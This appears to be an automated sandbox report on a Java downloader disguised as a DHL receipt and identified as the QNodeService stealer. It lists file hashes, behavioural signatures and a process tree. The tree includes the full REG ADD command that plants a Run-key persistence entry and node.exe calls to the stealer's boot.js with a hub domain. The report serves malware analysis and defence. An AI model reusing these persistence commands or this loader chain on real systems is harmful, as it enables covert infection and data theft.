Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 08:59
Static task
static1
Behavioral task
behavioral1
Sample
DHL_10090AWB_09800123_RECIEPT00097 .jar
Resource
win7
Behavioral task
behavioral2
Sample
DHL_10090AWB_09800123_RECIEPT00097 .jar
Resource
win10
General
-
Target
DHL_10090AWB_09800123_RECIEPT00097 .jar
-
Size
74KB
-
MD5
a754d565bf2979dc8a1e8963199fd466
-
SHA1
358b81c4665da96231c0b038a198eeedc905f36b
-
SHA256
7d652ebf3fc8f1368ff81ac8079ce332a8fde810bd4d7eca30a99196ba861114
-
SHA512
f0ec805734aab2edf833ff9149e534e214cb926da0e453896af29a5a9ec8113c46703675460e7d28032cfae766c3c20a8b0de9843ab4b95444b7b2589cc6b065
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
Processes:
node.exenode.exenode.exepid process 1904 node.exe 192 node.exe 4036 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\c311ae97-2207-4a0f-824d-4c118b9cd9f5 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 wtfismyip.com 24 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
node.exenode.exenode.exepid process 1904 node.exe 1904 node.exe 1904 node.exe 1904 node.exe 192 node.exe 192 node.exe 192 node.exe 192 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe 4036 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
java.exejavaw.exenode.exenode.exenode.execmd.exedescription pid process target process PID 3952 wrote to memory of 3724 3952 java.exe javaw.exe PID 3952 wrote to memory of 3724 3952 java.exe javaw.exe PID 3724 wrote to memory of 1904 3724 javaw.exe node.exe PID 3724 wrote to memory of 1904 3724 javaw.exe node.exe PID 1904 wrote to memory of 192 1904 node.exe node.exe PID 1904 wrote to memory of 192 1904 node.exe node.exe PID 192 wrote to memory of 4036 192 node.exe node.exe PID 192 wrote to memory of 4036 192 node.exe node.exe PID 4036 wrote to memory of 3776 4036 node.exe cmd.exe PID 4036 wrote to memory of 3776 4036 node.exe cmd.exe PID 3776 wrote to memory of 3284 3776 cmd.exe reg.exe PID 3776 wrote to memory of 3284 3776 cmd.exe reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL_10090AWB_09800123_RECIEPT00097 .jar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\d278f90a.tmp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.js --hub-domain glotronic.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.js --hub-domain glotronic.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c311ae97-2207-4a0f-824d-4c118b9cd9f5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "c311ae97-2207-4a0f-824d-4c118b9cd9f5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestampMD5
130cd458b5ed95b703f5604fd3b9d24e
SHA1d2e6e880e071fc0cfaa75bc77b2a6ddb12a6f4e8
SHA256126305d8b6da7c5c805c333c2264998139f41a6baebef1dfa59f319393dd7f30
SHA512931e43a0db0f7852c68baad37813b5fafa5f469a3449405580a686f6b618add36efc81e0c26f79a11bb31fdd83ecee995e380e86bde96b63d2c0e6ec64c6c710
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_VoFhKM\boot.jsMD5
3859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\AppData\Local\Temp\d278f90a.tmpMD5
a754d565bf2979dc8a1e8963199fd466
SHA1358b81c4665da96231c0b038a198eeedc905f36b
SHA2567d652ebf3fc8f1368ff81ac8079ce332a8fde810bd4d7eca30a99196ba861114
SHA512f0ec805734aab2edf833ff9149e534e214cb926da0e453896af29a5a9ec8113c46703675460e7d28032cfae766c3c20a8b0de9843ab4b95444b7b2589cc6b065
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
memory/192-175-0x0000000000000000-mapping.dmp
-
memory/192-177-0x00000196E2880000-0x00000196E2881000-memory.dmpFilesize
4KB
-
memory/1904-172-0x0000000000000000-mapping.dmp
-
memory/1904-174-0x000000428A540000-0x000000428A541000-memory.dmpFilesize
4KB
-
memory/3284-183-0x0000000000000000-mapping.dmp
-
memory/3724-52-0x0000000000000000-mapping.dmp
-
memory/3776-182-0x0000000000000000-mapping.dmp
-
memory/4036-179-0x0000000000000000-mapping.dmp
-
memory/4036-181-0x00000143E1B00000-0x00000143E1B01000-memory.dmpFilesize
4KB